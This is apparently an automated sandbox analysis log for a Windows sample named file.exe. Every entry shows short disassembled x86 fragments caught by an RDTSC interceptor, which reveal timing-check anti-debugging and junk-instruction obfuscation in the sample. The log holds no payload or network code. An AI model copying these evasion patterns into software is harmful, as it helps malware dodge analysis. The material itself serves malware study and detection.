                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6FEA5 second address: C6FEBB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F9278BE2831h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C70461 second address: C70488 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F927881D806h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007F927881D818h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74838 second address: C7483D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7483D second address: C74854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F927881D811h 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74854 second address: C74858 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74B17 second address: C74B1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74B1B second address: C74B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74B21 second address: C74B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74CB0 second address: C74CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74CB8 second address: C74CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74F4F second address: C74F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C751CD second address: C751D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C751D1 second address: C751F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9278BE2826h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9278BE2834h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C751F4 second address: C751F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7E012 second address: C7E018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7E018 second address: C7E023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7E023 second address: C7E039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F9278BE282Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7E039 second address: C7E05A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D812h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jc 00007F927881D837h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7E05A second address: C7E05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7E05E second address: C7E062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7E062 second address: C7E06F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7E06F second address: C7E075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7BFA7 second address: C7BFAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C26A second address: C7C275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F927881D806h 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C275 second address: C7C27A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C86E second address: C7C872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C872 second address: C7C878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C878 second address: C7C890 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D810h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C890 second address: C7C8A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jns 00007F9278BE2826h 0x0000000e pop eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7C8A2 second address: C7C8A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D49A second address: C7D4B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2837h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D4B5 second address: C7D4BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D4BF second address: C7D4C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D790 second address: C7D794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7D794 second address: C7D79A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7DA32 second address: C7DA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F927881D80Fh 0x00000009 jmp 00007F927881D813h 0x0000000e popad 0x0000000f jmp 00007F927881D817h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C86472 second address: C86476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8618F second address: C86197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C879C2 second address: C879C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8D6D7 second address: C8D6DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8DE61 second address: C8DE6E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9278BE2826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8DE6E second address: C8DE74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8DE74 second address: C8DE99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9278BE2831h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F9278BE2828h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 pop eax 0x00000018 pop eax 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8DE99 second address: C8DEC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D816h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F927881D811h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8E2E2 second address: C8E2F2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9278BE282Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8E2F2 second address: C8E2F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8E421 second address: C8E42B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9278BE2832h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8E568 second address: C8E56C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8E56C second address: C8E574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8E574 second address: C8E57D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C96B38 second address: C96B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F9278BE2826h 0x0000000a popad 0x0000000b jmp 00007F9278BE2835h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C96817 second address: C9681B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C980ED second address: C980FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F9278BE2826h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C980FA second address: C98131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F927881D823h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop esi 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C98131 second address: C98138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C98138 second address: C98144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F927881D806h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C98144 second address: C98148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA7170 second address: CA717A instructions: 0x00000000 rdtsc 0x00000002 je 00007F927881D812h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA717A second address: CA7180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6B10 second address: CA6B2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F927881D814h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6C63 second address: CA6C67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6C67 second address: CA6C80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D813h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6C80 second address: CA6CAB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9278BE2828h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F9278BE2839h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6CAB second address: CA6CB5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F927881D806h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6CB5 second address: CA6CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB1B63 second address: CB1B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB1B67 second address: CB1B6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC1B64 second address: CC1B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F927881D806h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0710 second address: CC0714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0B84 second address: CC0B8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC181D second address: CC1823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC1823 second address: CC182C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC182C second address: CC1834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD151D second address: CD1521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD1521 second address: CD152F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F9278BE2826h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD152F second address: CD1542 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D80Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD1542 second address: CD1548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD8984 second address: CD8988 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD883D second address: CD8842 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE62F3 second address: CE62F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6193 second address: CE6198 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE8C44 second address: CE8C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F927881D815h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D01FFB second address: D01FFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D01FFF second address: D0200F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007F927881D806h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0200F second address: D0202B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9278BE2826h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d jnp 00007F9278BE2836h 0x00000013 pushad 0x00000014 jng 00007F9278BE2826h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D01071 second address: D01079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D011D2 second address: D011F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jc 00007F9278BE2826h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9278BE282Eh 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D011F0 second address: D011F6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0132C second address: D01332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D01332 second address: D0133A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0133A second address: D01371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jp 00007F9278BE2838h 0x0000000d jmp 00007F9278BE2830h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F9278BE2830h 0x0000001b jp 00007F9278BE2826h 0x00000021 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D017A4 second address: D017B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F927881D806h 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0190A second address: D0190E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0190E second address: D01930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F927881D816h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D01930 second address: D01934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D01934 second address: D01938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D01A7E second address: D01A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D01A82 second address: D01ABA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 js 00007F927881D806h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F927881D80Ch 0x00000013 jp 00007F927881D81Eh 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D01ABA second address: D01ABF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D01ABF second address: D01AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F927881D806h 0x0000000a popad 0x0000000b jnp 00007F927881D80Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D038BC second address: D038C2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D038C2 second address: D038C7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0374F second address: D03759 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08FEA second address: D08FF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jno 00007F927881D806h 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D08FF6 second address: D09012 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2838h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D09012 second address: D09018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0ACBE second address: D0ACC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0ACC2 second address: D0ACC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC00BF second address: 4DC00C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
